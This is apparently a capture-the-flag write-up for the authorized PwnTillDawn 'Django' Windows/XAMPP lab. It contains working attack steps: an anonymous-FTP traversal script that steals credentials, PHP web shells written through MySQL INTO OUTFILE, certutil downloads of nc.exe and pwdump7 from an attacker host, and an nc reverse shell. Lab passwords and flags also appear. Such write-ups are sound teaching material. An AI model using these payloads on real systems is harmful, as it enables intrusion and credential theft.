ptd-django-private

First we start with an nmap scan of the target:

E:\PENTEST\NMAP>nmap -vv -A 10.150.150.212
WARNING: Could not import all necessary Npcap functions. You may need to upgrade to the latest version from http://www.npcap.org. Resorting to connect() mode -- Nmap may not function completely
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-20 13:18 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
Initiating Ping Scan at 13:18
Scanning 10.150.150.212 [2 ports]
Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:18
Completed Parallel DNS resolution of 1 host. at 13:18, 0.01s elapsed
Initiating Connect Scan at 13:18
Scanning 10.150.150.212 [1000 ports]
Discovered open port 443/tcp on 10.150.150.212
Discovered open port 3306/tcp on 10.150.150.212
Discovered open port 21/tcp on 10.150.150.212
Discovered open port 139/tcp on 10.150.150.212
Discovered open port 80/tcp on 10.150.150.212
Discovered open port 445/tcp on 10.150.150.212
Discovered open port 135/tcp on 10.150.150.212
Discovered open port 49157/tcp on 10.150.150.212
Discovered open port 49152/tcp on 10.150.150.212
Discovered open port 49158/tcp on 10.150.150.212
Discovered open port 49154/tcp on 10.150.150.212
Discovered open port 8089/tcp on 10.150.150.212
Discovered open port 49153/tcp on 10.150.150.212
Discovered open port 49155/tcp on 10.150.150.212
Completed Connect Scan at 13:19, 44.10s elapsed (1000 total ports)
Initiating Service scan at 13:19
Scanning 14 services on 10.150.150.212
Service scan Timing: About 64.29% done; ETC: 13:20 (0:00:30 remaining)
Completed Service scan at 13:20, 59.02s elapsed (14 services on 1 host)
NSE: Script scanning 10.150.150.212.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
NSE Timing: About 99.95% done; ETC: 13:20 (0:00:00 remaining)
Completed NSE at 13:20, 38.83s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for 10.150.150.212
Host is up, received syn-ack (0.032s latency).
Scanned at 2020-08-20 13:18:29 W. Europe Summer Time for 144s
Not shown: 986 filtered ports
Reason: 986 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack
| fingerprint-strings:
| GenericLines:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| command not understood.
| command not understood.
| Help:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| 'HELP': command not understood.
| NULL, SMBProgNeg:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| SSLSessionReq:
| 220-Wellcome to Home Ftp Server!
| Server ready.
|_ command not understood.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 . [NSE: writeable]
| drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 .. [NSE: writeable]
| drw-rw-rw- 1 ftp ftp 0 Mar 13 2019 FLAG [NSE: writeable]
| -rw-rw-rw- 1 ftp ftp 34419 Mar 26 2019 xampp-control.log [NSE: writeable]
|_-rw-rw-rw- 1 ftp ftp 881 Nov 13 2018 zen.txt [NSE: writeable]
| ftp-syst:
|_ SYST: Internet Component Suite
80/tcp open http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was http://10.150.150.212/dashboard/
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was https://10.150.150.212/dashboard/
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
445/tcp open microsoft-ds syn-ack Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: PWNTILLDAWN)
3306/tcp open mysql syn-ack MariaDB (unauthorized)
8089/tcp open ssl/http syn-ack Splunkd httpd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-10-29T14:31:26
| Not valid after: 2022-10-28T14:31:26
| MD5: 5d60 c8e6 37f3 eea2 1ca0 3cd3 bbae 8193
| SHA-1: 0c85 65c6 0e58 49e7 1882 b403 40f4 b521 6360 8ba9
| -----BEGIN CERTIFICATE-----
| MIIDMjCCAhoCCQDsGSJfSRwcdzANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV
| UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM
| BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW
| EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0xOTEwMjkxNDMxMjZaFw0yMjEwMjgxNDMx
| MjZaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK
| DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwA4l
| dCLRsUH/gqdstF7FgaM1VmhZb0ijlpG1sbpT8nG+OcPpI/LmQzMI73MceLrr3iGK
| TKBmT/7HiyLjVAUOC+sRxTr0NSUOESpmEm3HA60rV7xzCiGQIJcNoVWvR7gIF5gU
| 8G/Oqv2WBSJKVSg3z9up1FFYGF8VnEBUe/PyqGc0+mf0PC+vidx1V02PzeGfgG5o
| dnwCD0uaQ7yzH0GT9z59N8fYfXMcVM7pbdhUIATgF0tIkl9UgwF5RSsG4wMRmzqH
| /z+vjkn+hJdWydu33pD2J2st4a+v0vEDHqJYZkSXG7BqqMjsGpcjKnRsBen/JHxv
| FWlo45YUTNlqtP/+fwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA6nFTapGzsDIHj
| E38SOLEvQ5CWDWn+r1acCOTJ2U6gUzkymRhFfEZ9Sra8JK2F2a1IWcLrdbf495NN
| mwpwSU1D17DchCOIRxLFm8kq3imqLX0i/zgE3C+bsbl0MbgsTZsuZIRNEBSicfx6
| ZQPIuXl8HhFiJxGxK6/cQHs0R/GsaHCiB96QEyzRZzl9OieHwAI+JdAu/QDep7Av
| Z4bnpn9zJQhWIqAx6Zf7a2hLZbtNFqaFOH3sdlkI1r4vDunvIOfXXts2qq9PmitD
| C0xrGPL0+gkiEIdN5+6csG2RSnfwXO3K+ZA1ABXuLshoNVNoKve6kSCwzRBwUefX
| HkRDQlSM
|_-----END CERTIFICATE-----
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.70%I=7%D=8/20%Time=5F3E5C39%P=i686-pc-windows-windows%r(
SF:NULL,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Server\
SF:x20ready\.\r\n")%r(GenericLines,79,"220-Wellcome\x20to\x20Home\x20Ftp\x
SF:20Server!\r\n220\x20Server\x20ready\.\r\n500\x20'\r':\x20command\x20not
SF:\x20understood\.\r\n500\x20'\r':\x20command\x20not\x20understood\.\r\n"
SF:)%r(Help,5A,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Ser
SF:ver\x20ready\.\r\n500\x20'HELP':\x20command\x20not\x20understood\.\r\n"
SF:)%r(SSLSessionReq,89,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n2
SF:20\x20Server\x20ready\.\r\n500\x20'\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\
SF:xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<
SF:=\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0':\x20command\x20not\x20understood\.
SF:\r\n")%r(SMBProgNeg,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\
SF:n220\x20Server\x20ready\.\r\n");
Service Info: Hosts: Wellcome, DJANGO; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 56m57s, deviation: 1s, median: 56m56s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 18317/tcp): CLEAN (Timeout)
| Check 2 (port 19575/tcp): CLEAN (Timeout)
| Check 3 (port 8595/udp): CLEAN (Timeout)
| Check 4 (port 51927/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: Django
| NetBIOS computer name: DJANGO\x00
| Workgroup: PWNTILLDAWN\x00
|_ System time: 2020-08-20T12:17:14+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-20 14:17:18
|_ start_date: 2020-04-02 16:41:43

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: E:\PENTEST\NMAP
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.40 seconds

E:\PENTEST\NMAP>

What stands out: anonymous FTP on 21 with a writable root and a FLAG directory; XAMPP (Apache 2.4.34, PHP 5.6.38) on 80 and 443; MariaDB on 3306, where nmap's "unauthorized" tag means the server answered the probe with an access-denied error instead of a handshake; Splunkd on 8089; and SMB on a Windows 7 SP1 host named DJANGO with message signing disabled. Next, a directory brute-force against the web server:

kali@kali:~/ptd$ gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url https://10.150.150.212
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.150.150.212
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/20 07:38:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com1 (Status: 403)
/com2 (Status: 403)
/com3 (Status: 403)
/com4 (Status: 403)
/con (Status: 403)
/dashboard (Status: 301)
/favicon.ico (Status: 200)
/img (Status: 301)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 301)
/prn (Status: 403)
/secci (Status: 403)
/server-info (Status: 403)
/server-status (Status: 403)
/webalizer (Status: 403)
/xampp (Status: 301)
===============================================================
2020/08/20 07:40:25 Finished
===============================================================
kali@kali:~/ptd$
kali@kali:~/ptd$ mysql -u root -p 10.150.150.212
Enter password:thebarrierbetween
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
(Still to test from the Kali box: as written, 10.150.150.212 is taken as the database name and the client tries the local socket; the host has to be passed with -h 10.150.150.212.)
kali@kali:~/ptd$ nmap --script smb-vuln-* 10.150.150.212
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 08:18 EDT

The anonymous FTP root (see the ftp-anon listing in the nmap output) contains xampp-control.log. Pulling it and searching for "pass" shows where the XAMPP control panel wrote its password file:

E:\PENTEST\PTD>type xampp-control.log | findstr pass
3:11:25 PM [main] XAMPP Password Written in: "c:\xampp\passwords.txt"

From the FTP root, ../xampp/ resolves to c:\xampp, and Home Ftp Server does not stop the anonymous user from leaving its root, so the file can be fetched with a plain ../ traversal:

E:\PENTEST\PTD>ftp 10.150.150.212
Connected to 10.150.150.212.
220-Wellcome to Home Ftp Server!
220 Server ready.
530 Please login with USER and PASS.
User (10.150.150.212:(none)): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
ftp> get ../xampp/passwords.txt
200 Port command successful.
150 Opening data connection for ../xampp/passwords.txt.
226 File sent ok
ftp: 816 bytes received in 0.16Seconds 5.07Kbytes/sec.
ftp> quit
221 Goodbye.

E:\PENTEST\PTD>type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

User: root
Password:thebarrierbetween

2) FileZilla FTP:

[ You have to create a new user on the FileZilla Interface ]

3) Mercury (not in the USB & lite version):

Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)

User: newuser
Password: wampp

4) WEBDAV:

User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf

LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so

Please do not forget to refresh the WEBDAV authentification (users and passwords).

E:\PENTEST\PTD>
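The two steps above, anonymous login followed by a RETR that walks out of the FTP root, as a short script, together with a parser for the passwords.txt format. This is an added example and not code from the original write-up: the host and the traversal path come from the steps above, the sample text is copied from the listing so the parser runs offline, and the function names are my own.

```python
"""Anonymous-FTP traversal fetch and XAMPP passwords.txt parser.

Added example for this write-up, not code from the original post. The
target host and the traversal path ../xampp/passwords.txt come from the
steps above; function names and the sample text below are assumptions.
"""
import io
import re
from ftplib import FTP, error_perm

# Copied from the passwords.txt listing above so the parser can be
# exercised offline (the Attention text is shortened).
SAMPLE_PASSWORDS_TXT = """\
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

User: root
Password:thebarrierbetween

2) FileZilla FTP:

[ You have to create a new user on the FileZilla Interface ]

3) Mercury (not in the USB & lite version):

Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)

User: newuser
Password: wampp

4) WEBDAV:

User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
"""

SECTION_RE = re.compile(r"^\s*\d+\)\s*(.+?):\s*$")
FIELD_RE = re.compile(r"^\s*(User|Password)\s*:\s*(\S.*?)\s*$", re.IGNORECASE)


def fetch_via_traversal(host, path="../xampp/passwords.txt", port=21, timeout=10):
    """Log in as anonymous and RETR `path` relative to the FTP root.

    A server that confines anonymous users to their root answers 550 to
    the ../ path; Home Ftp Server on this box serves the file instead.
    Returns the file text, or None when the server refuses.
    """
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    ftp.login()  # anonymous login: ftplib sends USER anonymous / PASS anonymous@
    buf = io.BytesIO()
    try:
        ftp.retrbinary("RETR " + path, buf.write)
    except error_perm:  # 5xx reply: traversal blocked or file missing
        return None
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()
    return buf.getvalue().decode("utf-8", errors="replace")


def parse_xampp_passwords(text):
    """Return {service: [(user, password), ...]} for a passwords.txt.

    Sections start with "N) Name:"; a credential is a "User:" line followed
    by a "Password:" line (the colon may have no space after it, as in the
    MySQL entry above).
    """
    creds = {}
    section = None
    pending_user = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            creds.setdefault(section, [])
            pending_user = None
            continue
        m = FIELD_RE.match(line)
        if m is None or section is None:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "user":
            pending_user = value
        elif key == "password" and pending_user is not None:
            creds[section].append((pending_user, value))
            pending_user = None
    return creds


if __name__ == "__main__":
    text = fetch_via_traversal("10.150.150.212")
    if text is None:
        print("traversal refused: FTP root is confined")
    else:
        for service, pairs in parse_xampp_passwords(text).items():
            for user, password in pairs:
                print("%-40s %s : %s" % (service, user, password))
```

Running it against the box prints the root MySQL credential and the WebDAV and Mercury defaults; a 550 on the RETR is the result you want to see on a properly confined server.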

You don't need the password: phpMyAdmin at /phpmyadmin (found by gobuster) lets you straight in. From its SQL tab, a SELECT ... INTO OUTFILE writes a PHP web shell to disk, which is then used to launch a reverse shell.

One of the databases listed there is called flag18_ad1357d394eba91febe5a6d33dd3ec6dd0abc056, which is the flag itself.

mysql> SELECT "<?php eval($_POST['puckie'])?>" INTO OUTFILE 'C:/xampp/webshell.php';
Query OK, 1 row affected (0.00 sec)

That first write lands in C:\xampp rather than in the htdocs web root, so Apache never serves it. Writing into htdocs instead gives a shell that can be reached over HTTP (backslashes are escape characters inside a MySQL string literal, hence the doubled \\; forward slashes work as well):

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
http://10.150.150.212/backdoor.php?cmd=whoami
http://10.150.150.212/backdoor.php?cmd=dir%20c:\users\chuck.norris\desktop
flag11 = 7a763d39f68ece1edd1037074ff8d129451af0b1
http://10.150.150.212/backdoor.php?cmd=mkdir /temp
http://10.150.150.212/backdoor.php?cmd=certutil -urlcache -split -f "http://10.66.66.94/nc.exe" c:\\temp\nc.exe

http://10.150.150.212/backdoor.php?cmd=c:\\temp\nc.exe 10.66.66.94 53 -e cmd.exe
E:\PENTEST>nc -nlvp 53
listening on [any] 53 ...
connect to [10.66.66.94] from (UNKNOWN) [10.150.150.212] 49269
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami
whoami
django\chuck.norris

c:\Users\chuck.norris\Desktop>type flag11.txt
type flag11.txt
7a763d39f68ece1edd1037074ff8d129451af0b1

c:\xampp>type flag20.txt
type flag20.txt
a9435c140b6667cf2f24fcf6a9a1ea6b8574c3e7

The same certutil download stages further tooling, e.g. pwdump7 for dumping the local password hashes:

certutil -urlcache -split -f "http://10.66.66.94/pwdump7.exe" c:\\temp\pwdump7.exe

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
